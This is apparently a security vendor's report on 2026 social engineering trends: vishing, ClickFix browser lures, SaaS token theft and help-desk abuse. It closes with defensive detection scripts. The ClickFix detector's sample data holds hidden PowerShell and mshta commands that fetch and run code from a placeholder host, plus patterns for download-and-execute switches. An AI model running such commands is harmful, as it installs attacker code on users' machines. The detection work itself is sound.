
Introduction

For years, phishing emails drove most social engineering attacks. That has changed. According to Mandiant’s M-Trends 2026 report, based on over 500,000 hours of incident response work, voice phishing has overtaken email as the primary social engineering vector. Email phishing dropped to just 6% of confirmed initial access methods in 2025. Voice phishing rose to 11%, and in cloud-related compromises it reached 23%.

The shift matters. It means the attackers who succeed most often are not sending bulk emails. They are calling help desks, impersonating employees, and talking their way past identity checks in real time. Many of these intrusions leave no malware trace at all. They succeed because someone believed a request was legitimate.

Social engineering remains the attacker’s preferred starting point. Unit 42’s 2025 incident response data found that 36% of all cases began with a social engineering tactic. What makes it dangerous is not the technology behind it, but how easily it fits into everyday work. A password reset, a supplier payment update, a browser security prompt. Each looks routine. Each can be the start of a compromise.

This report covers how social engineering has changed in the past year, what the latest incident data reveals, and what leaders can do to reduce its impact. It includes real-world cases, process-level controls, detection metrics, and a 30-day action plan.

Behind almost every major breach, there is a human story. One decision, one call, or one moment of misplaced trust that changed everything.

How Social Engineering Works in 2026

Social engineering works because it does not look like an attack. It feels normal. A call from IT support, a supplier email, a browser prompt asking you to install a security update. Each seems routine. Each can be the start of a compromise.

Attackers use one clear advantage: human trust. They study how people work, the tools they use, and the habits they follow every day. Then they build stories that fit those patterns. The goal is to make a small request that seems harmless. Reset a password. Approve a login. Confirm a payment.

Once that trust is gained, everything else follows. Access is granted, credentials are harvested, and security alerts are often ignored because the activity looks legitimate. In many cases, no malware is deployed. The attackers use the same tools as the employees they impersonate: email, Teams, VPN portals, and identity platforms.

Three forms dominate in 2026:

High-touch manipulation. Attackers interact directly with staff, primarily by phone. They call IT help desks and finance teams, using real-time voice to reset MFA tokens, unlock accounts, or change payment details. Mandiant’s M-Trends 2026 report documents groups like Scattered Spider (UNC3944) escalating from a single help desk call to full domain admin access in under 40 minutes, using no malware at all.

Browser and search-based deception. Automated lures reach users through fake browser prompts, search engine poisoning, and fraudulent system messages. A growing category known as ClickFix attacks deserves particular attention. These campaigns present users with a fake error message or CAPTCHA page and instruct them to “fix” the problem by copying and running a command, often a PowerShell script. The user initiates the action themselves, which means endpoint controls and web filters may not catch it. The browser is replacing the inbox as the most exploited entry point.

Supply chain impersonation. Some groups now chain multiple tactics together. The ShinyHunters operation, documented extensively in Mandiant’s 2026 report, used voice phishing to compromise credentials at third-party SaaS vendors, then harvested OAuth tokens and session cookies to pivot into downstream customer environments. What began as a phone call to one organisation ended in data theft across many.

Each of these methods takes advantage of process, not code. They exploit how organisations manage identity, approve access, and respond to urgency. The weakness is not the system. It is the workflow itself.

Why Social Engineering Keeps Winning

Technical defences have never been stronger. Firewalls, endpoint protection, and advanced monitoring are now standard. Yet social engineering keeps breaking through. The reason is simple: technology can’t patch human behaviour.

Attackers don’t need to find software flaws when they can exploit trust, pressure, or routine. They focus on how people respond, not how systems work. That makes these attacks faster, cheaper, and often invisible to security tools.


Several factors explain why this tactic still dominates in 2026:

1. Alert fatigue and missed signals. Security teams face a flood of alerts every day. When thousands of notifications compete for attention, small anomalies get lost. Attackers know this. They mimic legitimate logins and user behaviour so their actions blend in. What looks like a normal access request can be a full compromise in progress. The window for response is shrinking fast. Mandiant’s M-Trends 2026 report found that the median time between initial access and hand-off to a second threat actor collapsed from over eight hours in 2022 to 22 seconds in 2025. By the time a SOC analyst reads the alert, the access may already have been passed to a ransomware operator.

2. Over-permitted accounts. Many employees have more access than they need. When one of those accounts is compromised, the attacker inherits all its privileges. That single mistake can give them control over email systems, shared drives, or cloud dashboards.

3. Inconsistent identity verification. Help desks and approval processes are often built for speed, not scrutiny. If a request sounds urgent or convincing, it is easy to bypass normal checks. Attackers exploit this by pretending to be executives, suppliers, or even auditors.

4. The pressure to respond quickly. Modern business moves fast. Messages marked as “urgent” get priority. Criminals use this to push employees into decisions before they have time to verify. A payment request, a password reset, or a new meeting link, all can look routine under pressure.

5. AI-enhanced deception, but not in the way most people think. Artificial intelligence is now part of the attacker’s toolkit for social engineering. Criminals use AI tools to personalise phishing lures, clone voices, and build more convincing pretexts. Purpose-built criminal platforms, not consumer tools like ChatGPT, are being commercialised for this. Phishing-as-a-service kits with AI-generated templates now cost as little as $200 per month on criminal forums.

However, the picture is more nuanced than the headlines suggest. Mandiant’s assessment in M-Trends 2026 is clear: 2025 was not the year in which breaches became a direct result of AI. The vast majority of successful intrusions still stem from human and systemic failures such as weak identity verification, over-permitted accounts, and inconsistent MFA. AI makes social engineering faster and more convincing, but the underlying weaknesses it exploits are the same ones that existed before AI entered the picture.

This matters for how you invest. The answer is not to panic about AI-generated deepfakes. The answer is to fix the process gaps that attackers, with or without AI, continue to walk through.

The New Tactics and Trends of 2026

Social engineering is evolving. The channels are changing, the speed is increasing, and the line between criminal and state-sponsored activity is harder to draw. Below are the five clearest shifts we see heading into 2026, drawn from incident data rather than speculation.

1. Voice phishing overtakes email

For the first time, voice phishing has displaced email as the dominant social engineering method in confirmed incidents. Mandiant’s M-Trends 2026 report records email phishing at just 6% of initial access vectors, down from a much larger share in previous years. Voice phishing rose to 11% overall, and 23% in cloud-related compromises.

Separately, CrowdStrike recorded a 442% increase in vishing attacks in the second half of 2024 compared to the first half.

This is not a small shift. It means that organisations whose detection, training, and verification processes are built around email are increasingly misaligned with how attacks actually arrive. Phone calls bypass spam filters, email authentication, and most endpoint controls. They exploit trust in the moment, not through a link someone can inspect later.

What to watch: Unexpected calls requesting MFA resets, password changes, or device registrations. Callers who know your internal process language. Any helpdesk interaction that results in a privilege change.

2. ClickFix and browser-based attacks

A growing category of social engineering now targets users through their browser rather than their inbox. ClickFix campaigns present victims with a fake error message, CAPTCHA page, or “security update required” prompt. The page instructs the user to copy a command and paste it into a system dialog, typically PowerShell on Windows.

The user initiates the action themselves. Because there is no malicious attachment or link to scan, many web and endpoint controls do not flag it early. The user becomes the execution engine for the attacker’s payload.

Security researchers at Red Canary and elsewhere have identified the browser as overtaking email as phishing’s most exploited entry point in 2026. These campaigns use search engine poisoning, look-alike download pages, and social media distribution to reach targets.

What to watch: “Click to fix” browser popups, search results leading to unfamiliar download pages, and any prompt asking a user to run a command or script they did not initiate.
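The process-tree shape described above is detectable even when the payload itself is not. The following Python is an added example, not code from the page’s authors or from any vendor cited here: it scores constructed, Sysmon-style process-creation records (the field names, the sample records and the indicator weights are this example’s assumptions) and flags an interpreter launched by an interactive parent such as explorer.exe or a browser with download-and-execute or hidden-window switches, which is what a pasted ClickFix command looks like at the endpoint.

```python
"""Score process-creation events for the ClickFix shape: an interactive parent
(explorer.exe or a browser) spawning an interpreter with download-and-execute or
obfuscation switches pasted from a web page. Added example; field names, sample
records and weights are this example's assumptions, not a vendor schema."""

import re

# Constructed, Sysmon-like process-creation records (illustrative, not captured telemetry).
SAMPLE_EVENTS = [
    {"host": "WS-0142", "user": "CORP\\jdoe",
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": 'powershell -w hidden -nop -c "iex (irm https://example.invalid/fix)"'},
    {"host": "WS-0142", "user": "CORP\\jdoe",
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta https://example.invalid/captcha.hta"},
    {"host": "WS-0077", "user": "NT AUTHORITY\\SYSTEM",
     "parent_image": r"C:\Windows\CCM\CcmExec.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell -ExecutionPolicy Bypass -File C:\ProgramData\Inv\inventory.ps1"},
    {"host": "WS-0099", "user": "CORP\\bwong",
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": 'cmd /c "echo hello"'},
]

# Parents a human drives directly: a paste into Win+R or a browser-launched terminal lands here.
INTERACTIVE_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
# Interpreters and living-off-the-land binaries that ClickFix pages tell the victim to run.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe", "curl.exe", "certutil.exe"}

# (weight, pattern). Weights are an assumption, chosen so download-and-execute chains
# score high while an innocent "cmd /c echo" from the desktop scores zero.
INDICATORS = [
    (3, re.compile(r"\b(iex|invoke-expression)\b", re.I)),
    (3, re.compile(r"\b(irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring|downloadfile)\b", re.I)),
    (2, re.compile(r"https?://", re.I)),
    (2, re.compile(r"-(w|windowstyle)\s+hidden", re.I)),
    (2, re.compile(r"-(e|ec|enc|encodedcommand)\b", re.I)),
    (1, re.compile(r"-(nop|noprofile|noni|noninteractive)\b", re.I)),
    (2, re.compile(r"\bmshta(\.exe)?\s+https?://", re.I)),
]


def basename(path: str) -> str:
    """Return the lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(event: dict) -> int:
    """Return a suspicion score; 0 means the event does not fit the ClickFix shape."""
    if basename(event["parent_image"]) not in INTERACTIVE_PARENTS:
        return 0
    if basename(event["image"]) not in INTERPRETERS:
        return 0
    return sum(weight for weight, rx in INDICATORS if rx.search(event["command_line"]))


def detect_clickfix(events, threshold: int = 4):
    """Return [(score, event)] for events at or above threshold, highest score first."""
    scored = [(score_event(e), e) for e in events]
    return sorted(((s, e) for s, e in scored if s >= threshold), key=lambda t: -t[0])


if __name__ == "__main__":
    for score, event in detect_clickfix(SAMPLE_EVENTS):
        print(f"[{score:>2}] {event['host']} {event['user']}: {event['command_line']}")
```

The parent filter is what keeps the rule quiet: the same `-ExecutionPolicy Bypass` line launched by a management agent scores nothing, while the `mshta https://…` variant is caught even though it contains no PowerShell keyword. In production the same logic maps onto Sysmon Event ID 1 or Windows Security event 4688 with command-line auditing enabled.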

3. AI as a force multiplier, not a root cause

AI is now embedded in attacker workflows for social engineering. Criminals use large language models to write personalised lures, generate convincing pretexts, and shift from mass campaigns toward rapport-building conversations tailored to individual targets.

Purpose-built criminal AI tools are more concerning than misuse of consumer AI products. Platforms like SheByte, a phishing-as-a-service kit available on the criminal underground, automate the creation of phishing sites using AI-generated templates. Deepfake voice and video tools are increasingly woven across entire attack chains rather than used as standalone tricks.

That said, Mandiant’s frontline assessment in M-Trends 2026 provides an important corrective to the hype: AI is not yet the root cause of most breaches. The majority of successful intrusions in 2025 still stemmed from fundamental human and systemic failures. Weak identity verification, excessive permissions, and poor logging remain the primary reasons social engineering works.

AI raises the ceiling of what attackers can do. But the floor, the basic process gaps that most attacks exploit, has not changed.

What to watch: Highly personalised voice calls or messages that reference real internal details. Lures that adapt tone and context mid-conversation. Synthetic media used to impersonate executives or trusted contacts.

4. Industrialised access brokering

Social engineering incidents are no longer standalone events. In a growing number of cases, the group that gains initial access is not the same group that carries out the follow-on attack.

Mandiant’s M-Trends 2026 report documents a clear division-of-labour model: one cluster gains access through social engineering, then hands it to a separate cluster for data theft, ransomware, or fraud. This pattern appeared in 9% of 2025 investigations, up from 4% in 2022. The median hand-off time between initial access and transfer to a second group has collapsed from over eight hours to 22 seconds.

Groups like ShinyHunters exemplify this model. Using vishing campaigns, they compromise credentials at SaaS vendors, harvest OAuth tokens and session cookies, then use those secrets to pivot into downstream customer environments for large-scale data theft. Victims later receive extortion notes.

The practical implication is important: a social engineering incident at a single employee’s account is no longer contained to that account. It can be the entry point for a chain of compromises across connected systems and organisations.

What to watch: Any social engineering attempt, even one that appears to fail, should be treated as a potential precursor to a broader operation. Monitor for credential reuse, unusual OAuth consent grants, and lateral movement into connected platforms.
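One of the signals named above, an unusual OAuth consent grant, can be triaged mechanically. The Python below is an added example, not the page’s or Mandiant’s code: it scores constructed, simplified consent events by the permissions granted, whether the publisher is verified, and whether the application has already been reviewed. Scope names follow Microsoft Graph conventions for illustration; the weights, the allow-list and the record layout are assumptions, not a vendor’s audit-log schema.

```python
"""Triage OAuth consent grants for the pattern that follows a vished credential:
a user consents to an unfamiliar app that asks for mailbox, file or directory
access plus offline_access, so a refresh token outlives the password and MFA
reset that follow. Added example; record layout, weights and allow-list are
this example's assumptions, not a vendor's audit-log schema."""

# Permission weights. Scope names follow Microsoft Graph conventions for illustration.
SCOPE_WEIGHTS = {
    "offline_access": 2,          # refresh token: persistence beyond the session
    "Mail.Read": 3, "Mail.ReadWrite": 4, "Mail.Send": 4,
    "Files.Read.All": 3, "Files.ReadWrite.All": 4, "Sites.ReadWrite.All": 4,
    "Directory.ReadWrite.All": 5, "RoleManagement.ReadWrite.Directory": 5,
    "openid": 0, "profile": 0, "email": 0, "User.Read": 0,
}
UNKNOWN_SCOPE_WEIGHT = 1          # anything not catalogued above still counts a little

# Application IDs the tenant has already reviewed (constructed placeholder values).
KNOWN_APP_IDS = {"22222222-2222-2222-2222-222222222222"}

# Constructed, simplified consent events (illustrative, not an audit-log export).
SAMPLE_CONSENTS = [
    {"ts": "2025-06-03T09:14:22Z", "user": "jdoe@corp.example",
     "app_name": "Mailbox Sync Helper", "app_id": "11111111-1111-1111-1111-111111111111",
     "publisher_verified": False, "consent_type": "user",
     "scopes": ["offline_access", "Mail.ReadWrite", "Mail.Send", "Files.Read.All"]},
    {"ts": "2025-06-03T10:02:10Z", "user": "asmith@corp.example",
     "app_name": "Collaboration Client", "app_id": "22222222-2222-2222-2222-222222222222",
     "publisher_verified": True, "consent_type": "user",
     "scopes": ["openid", "profile", "User.Read"]},
    {"ts": "2025-06-03T11:40:00Z", "user": "it.admin@corp.example",
     "app_name": "HR Connector", "app_id": "33333333-3333-3333-3333-333333333333",
     "publisher_verified": True, "consent_type": "admin",
     "scopes": ["Directory.ReadWrite.All", "offline_access"]},
]


def score_consent(event: dict) -> tuple[int, list[str]]:
    """Return (score, reasons) for one consent grant."""
    score, reasons = 0, []
    for scope in event["scopes"]:
        weight = SCOPE_WEIGHTS.get(scope, UNKNOWN_SCOPE_WEIGHT)
        if weight:
            score += weight
            reasons.append(f"scope {scope} (+{weight})")
    if event["app_id"] not in KNOWN_APP_IDS:
        score += 2
        reasons.append("application not previously reviewed (+2)")
    if not event["publisher_verified"]:
        score += 2
        reasons.append("publisher not verified (+2)")
    if event["consent_type"] == "user" and "offline_access" in event["scopes"]:
        score += 1
        reasons.append("end-user consent that issues a refresh token (+1)")
    return score, reasons


def triage_consents(events, threshold: int = 6):
    """Return findings at or above threshold, highest score first."""
    findings = []
    for e in events:
        score, reasons = score_consent(e)
        if score >= threshold:
            findings.append({"user": e["user"], "app_name": e["app_name"],
                             "score": score, "reasons": reasons})
    return sorted(findings, key=lambda f: -f["score"])


if __name__ == "__main__":
    for f in triage_consents(SAMPLE_CONSENTS):
        print(f"[{f['score']:>2}] {f['user']} -> {f['app_name']}: " + "; ".join(f["reasons"]))
```

The HR Connector grant still surfaces despite a verified publisher and admin consent, because Directory.ReadWrite.All plus a refresh token is exactly what an attacker who has talked an administrator through a consent screen wants. The score exists to make a human look at the grant, not to block it automatically.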

5. Recovery denial as the new endgame

Ransomware groups have moved beyond encrypting files and demanding payment. In 2025, Mandiant documented a systematic shift toward what analysts now call recovery denial: attackers deliberately destroy the infrastructure organisations need to recover before deploying ransomware.

This includes targeting backup systems, identity services, virtualisation management planes, and credential vaults. In documented cases, attackers wiped millions of backup objects from cloud storage, encrypted datastore files at the hypervisor level, and forced password changes on privileged accounts to lock defenders out of emergency access.

The connection to social engineering is direct. The initial foothold that enables these operations is often a vishing call to a help desk, a compromised set of credentials obtained through impersonation, or an OAuth token harvested after a social engineering campaign against a SaaS vendor.

When social engineering leads to credential compromise, and that compromise leads to the destruction of recovery capability, the business impact is no longer a data breach. It is an operational crisis.

What to watch: Any social engineering attempt targeting accounts with access to backup systems, identity infrastructure, or virtualisation management. Unusual activity on break-glass accounts or credential vaults.

What This Looks Like in Practice

The trends above are not theoretical. Below are three incidents from 2025 that illustrate how social engineering drives real compromise, and how the business impact extends far beyond the initial phone call or message.

Coinbase: bribed insiders, targeted social engineering

In May 2025, Coinbase confirmed that cybercriminals had bribed overseas support staff to leak sensitive customer data, including names, dates of birth, email addresses, and partial Social Security numbers. The attackers then used this data to run highly targeted social engineering campaigns against Coinbase customers.

When the attackers demanded a $20 million ransom, Coinbase refused and instead offered a bounty for information leading to their arrest. The estimated cost of customer reimbursements ran into hundreds of millions of dollars.

The lesson is uncomfortable but clear: the insider threat and the social engineering threat are not separate problems. One enables the other.

ShinyHunters: vishing into the SaaS supply chain

Throughout 2025, a cluster tracked by Mandiant used voice phishing to compromise credentials at third-party SaaS vendors. Once inside, the attackers harvested OAuth tokens, session cookies, and hard-coded access keys. They then used these secrets to pivot into downstream customer environments, including major enterprises.

No malware was deployed. No software vulnerability was exploited. The entire operation ran on phone calls, trust, and the persistent access that SaaS tokens provide. Victims received extortion notes branded under the ShinyHunters name.

This case illustrates why third-party risk assessments must account for social engineering, not just technical controls. The weakest link was not a firewall or an unpatched server. It was a person who answered the phone.

UK retailers: Scattered Spider and DragonForce

In 2025, the group known as Scattered Spider (tracked by Mandiant as UNC3944) compromised multiple well-known UK retailers. Initial access was gained through social engineering of help desk staff, a pattern this group has used consistently since its attacks on Las Vegas casinos in 2023.

Once inside, the group deployed DragonForce ransomware. The attacks caused significant operational disruption and attracted national media coverage.

The pattern is now well documented: social engineering of the help desk, followed by MFA bypass, lateral movement, and ransomware deployment. These are not sophisticated technical exploits. They are process failures that repeat because the underlying verification gaps have not been closed.

How Attackers Exploit Human Processes

Social engineering works best when it looks like business as usual. Attackers copy how your teams already work, then slip into the gaps. Here are the most common weak points, and why they fail.


1) Identity recovery and MFA resets

2) Payment changes and fast approvals

3) Inbox trust and executive impersonation

4) Browser prompts, ClickFix, and search “fixes”

5) Supplier and recruiter impersonation

6) “Exception” culture

What this means for leaders

Business Impact and Regulation

Why it hurts

What EU and UK regulators expect

NIS2: Clear governance over risk, identity, and incident handling. That includes access control, multi-factor or continuous authentication (Article 21(2)(j)), monitoring, and rapid reporting: an early warning within 24 hours of becoming aware of a significant incident and a fuller notification within 72 hours (Article 23). Social engineering that leads to a network or information system compromise falls squarely within scope.

DORA: Treat ICT and third-party providers as critical. Test controls, keep evidence, classify incidents, and report within set timelines. The SaaS supply chain compromises documented in 2025, where vishing at a vendor led to data theft across customer environments, are exactly the kind of scenario DORA is designed to address.

GDPR and sector rules: If social engineering leads to personal data exposure, you may face breach notification obligations and fines. Evidence of due diligence matters. Organisations that can demonstrate scripted verification processes, dual approval controls, and auditable identity recovery workflows are in a stronger position than those that cannot.

UK Government Counter Fraud Strategy: The UK Government’s Counter Fraud Functional Strategy 2025-2026 progress review, published in March 2026, reported £7.5 billion saved through fraud prevention and enforcement. The direction of travel is clear: regulators expect proactive, evidenced controls, not reactive responses.

Controls That Work

Keep it simple and procedural. Make fraud harder, slower, and visible.

Verify the person

Control the action

Harden identity recovery

Reduce easy paths

Train for the real thing

Defend beyond the inbox

Most social engineering controls were designed for email-based attacks. That is no longer sufficient. Detection and verification processes must now extend to voice calls, messaging platforms, browser-based vectors, and collaboration tools like Teams and Slack.

For voice calls, this means enforcing callback verification using directory numbers, not numbers provided by the caller. For browser-based threats, it means removing the paths a ClickFix lure depends on: disable the Windows Run dialog and restrict PowerShell, mshta and the Windows Script Host for standard users through Group Policy and application control, maintain allow-lists for software installations, and alert when an interpreter is launched from explorer.exe or a browser with download-and-execute arguments. For collaboration platforms, it means treating messages from external contacts with the same scrutiny as external email.

The principle is simple: if an attacker can reach your staff through a channel, your verification controls must cover that channel.

What to implement this quarter

5 Questions for the Board

Social engineering is not a technical problem that can be delegated to the security team alone. It is a business risk that depends on how your organisation verifies identity, approves changes, and responds to urgency. These are questions that leadership should be able to answer.

1. Can your helpdesk verify identity without relying on information an attacker could find online? If your verification process depends on name, date of birth, employee number, or email address, it is vulnerable. Attackers routinely gather this information from LinkedIn, corporate websites, and data breaches. A process that feels thorough but relies on publicly available facts is not verification. It is theatre.

2. When did you last test your team’s response to a voice call, not just a phishing email? Most phishing simulations test email. The data now shows that voice phishing is more likely to succeed, harder to detect, and growing faster. If you have never tested whether your help desk, finance team, or executive assistants can spot a convincing vishing attempt, you do not know your actual exposure.

3. Do you have dual approval and time-boxed holds for payment changes and bank detail updates? A single approver under time pressure is the most common point of failure in payment fraud. Dual approval with a mandatory hold period, even 24 hours, is one of the simplest and most effective controls available. If your process allows one person to change supplier bank details and release a payment on the same day, that gap is likely to be exploited.

4. How quickly would you detect a compromised identity being used across cloud platforms? Attackers who gain credentials through social engineering often move laterally into SaaS platforms, email, and collaboration tools within minutes. If your monitoring does not cover OAuth consent grants, session anomalies, and cross-platform access patterns, compromised accounts can operate undetected for days or weeks.

5. Do your incident response plans account for multi-channel social engineering? If your IR playbook assumes a phishing email as the starting point, it may not cover scenarios that begin with a phone call, a Teams message, or a browser-based lure. The attack surface for social engineering has widened. Response plans should reflect that.

If your leadership team cannot answer these questions with confidence, it is worth reviewing whether your current controls match your actual risk.

Detection and Metrics

Detection should focus on behaviour. You are looking for signs that a person or a process is being misused, especially after identity changes or helpdesk activity.

What to surface

Keep evidence. Log who approved what, when, and why. Store MFA changes, device joins, consent grants, role assignments and the start and end of any privileged session. In finance, record the callback, the verifier and the hold release time. For helpdesk activity, capture artefacts reviewed and challenge questions used. This gives incident responders and auditors a clear trail.
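The evidence listed above is most useful when it is correlated rather than merely stored. The Python below is an added example, not code from the page or any vendor: it walks a constructed, simplified identity event stream (the field names, weights and time window are assumptions) and raises an alert when a help-desk MFA reset is followed within an hour by a new authenticator, an unfamiliar device or country, a privileged role assignment, or an OAuth consent, which is the sequence a vished reset produces and a legitimate one does not.

```python
"""Correlate a help-desk MFA reset with what happens to the account next.
A legitimate reset is followed by the same person re-enrolling and signing in
from a known device. A vished reset is followed by a new authenticator, an
unfamiliar device or country, and a privilege or consent change within minutes.
Added example; field names, weights and the window are this example's assumptions."""

from datetime import datetime, timedelta

# Constructed, simplified identity events from several sources (help-desk ticketing,
# identity provider sign-in and audit logs) normalised into one record shape.
SAMPLE_EVENTS = [
    {"ts": "2025-06-03T09:00:00Z", "user": "jdoe", "type": "helpdesk_mfa_reset", "actor": "helpdesk.tier1", "ticket": "INC-4821"},
    {"ts": "2025-06-03T09:03:11Z", "user": "jdoe", "type": "mfa_method_added", "detail": "Authenticator app"},
    {"ts": "2025-06-03T09:05:40Z", "user": "jdoe", "type": "sign_in", "country": "NL", "device_known": False},
    {"ts": "2025-06-03T09:09:02Z", "user": "jdoe", "type": "device_registered", "detail": "DESKTOP-7KQ2"},
    {"ts": "2025-06-03T09:21:45Z", "user": "jdoe", "type": "role_assigned", "detail": "Global Administrator"},
    {"ts": "2025-06-03T13:00:00Z", "user": "asmith", "type": "helpdesk_mfa_reset", "actor": "helpdesk.tier1", "ticket": "INC-4830"},
    {"ts": "2025-06-03T13:04:00Z", "user": "asmith", "type": "mfa_method_added", "detail": "Authenticator app"},
    {"ts": "2025-06-03T13:06:00Z", "user": "asmith", "type": "sign_in", "country": "GB", "device_known": True},
]

HOME_COUNTRIES = {"GB"}          # assumption: where this organisation's staff normally sign in from
WINDOW = timedelta(minutes=60)   # how long after the reset follow-on activity is attributed to it

# Re-enrolling a method is expected after any reset (low weight). A role assignment or
# an OAuth consent is something a help-desk reset should never need (high weight).
FOLLOW_ON_WEIGHTS = {
    "mfa_method_added": 1,
    "device_registered": 2,
    "oauth_consent": 3,
    "role_assigned": 5,
}


def parse_ts(value: str) -> datetime:
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def score_follow_on(event: dict) -> tuple[int, str]:
    """Score one event that followed a reset; returns (weight, reason)."""
    if event["type"] == "sign_in":
        weight, parts = 0, []
        if not event.get("device_known", True):
            weight += 2
            parts.append("unknown device")
        if event.get("country") not in HOME_COUNTRIES:
            weight += 2
            parts.append(f"sign-in from {event.get('country')}")
        return weight, ", ".join(parts)
    weight = FOLLOW_ON_WEIGHTS.get(event["type"], 0)
    return weight, f"{event['type']}: {event.get('detail', '')}"


def correlate(events, window: timedelta = WINDOW, threshold: int = 4):
    """Return one alert per help-desk reset whose follow-on activity scores >= threshold."""
    by_user = {}
    for e in sorted(events, key=lambda e: e["ts"]):
        by_user.setdefault(e["user"], []).append(e)

    alerts = []
    for user, user_events in by_user.items():
        for i, anchor in enumerate(user_events):
            if anchor["type"] != "helpdesk_mfa_reset":
                continue
            deadline = parse_ts(anchor["ts"]) + window
            score, reasons = 0, []
            for e in user_events[i + 1:]:
                if parse_ts(e["ts"]) > deadline:
                    break
                weight, reason = score_follow_on(e)
                if weight:
                    score += weight
                    reasons.append(f"{e['ts']} {reason} (+{weight})")
            if score >= threshold:
                alerts.append({"user": user, "ticket": anchor["ticket"],
                               "reset_by": anchor["actor"], "score": score, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for a in correlate(SAMPLE_EVENTS):
        print(f"[{a['score']:>2}] {a['user']} after {a['ticket']} (reset by {a['reset_by']})")
        for r in a["reasons"]:
            print("      " + r)
```

The reset ticket is the anchor, so each alert already carries who approved the reset and when, which is the evidence trail the paragraph above asks for. A routine reset (asmith) scores 1 and stays silent; the vished pattern (jdoe) scores well above threshold within 22 minutes, long before a weekly sampling of resets would have reached it.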

Metrics to manage

Review these weekly. If any indicator drifts, adjust scripts, training and ownership before it becomes a pattern.

30-Day Action Plan

This is a short, practical plan to raise your defences quickly. Keep the scope tight. Prove the controls work. Capture evidence as you go.

Week 1: Set the rules

Week 2: Tighten identity and access

Week 3: Make detection useful

Week 4: Test and fix

Finish line

Write a short memo to the leadership team with three items: the verification policy link, this month’s KPI snapshot, and the top three fixes you made. This builds trust and keeps the work funded.

Wrapping Up

Social engineering thrives because it looks like normal work. A call to the helpdesk. A supplier message. A browser prompt that seems routine.

What has changed is where these attacks arrive. Voice calls, messaging platforms, and browser-based lures now carry as much risk as email, and in some cases more. The controls that matter, verification, dual approval, time-boxed holds, and auditable evidence, are the same regardless of channel. But they must be applied consistently across every path an attacker can use to reach your staff.

The defence is not complicated. Verify the person using a number you already trust. Slow any high-risk change with a second approver and a short hold. Keep evidence of every reset, approval, and exception. When these habits are in place, most attempts fail quietly. The ones that slip through leave a clear trail you can act on.

Leaders set the tone. Publish one page of simple rules. Sample a small percentage of resets and payments every week. Track a handful of KPIs so everyone sees whether controls are working. When exceptions are needed, record them and close them quickly. This is the work that reduces loss, shortens investigations, and strengthens your position with regulators.

If you want to test whether your current controls match your actual risk, speak with our team. We can help you align policy and practice across identity recovery, approvals, and monitoring, with attention to measurable outcomes and regulatory expectations.

Curated with purpose, delivered with precision – The ThreatScene Team

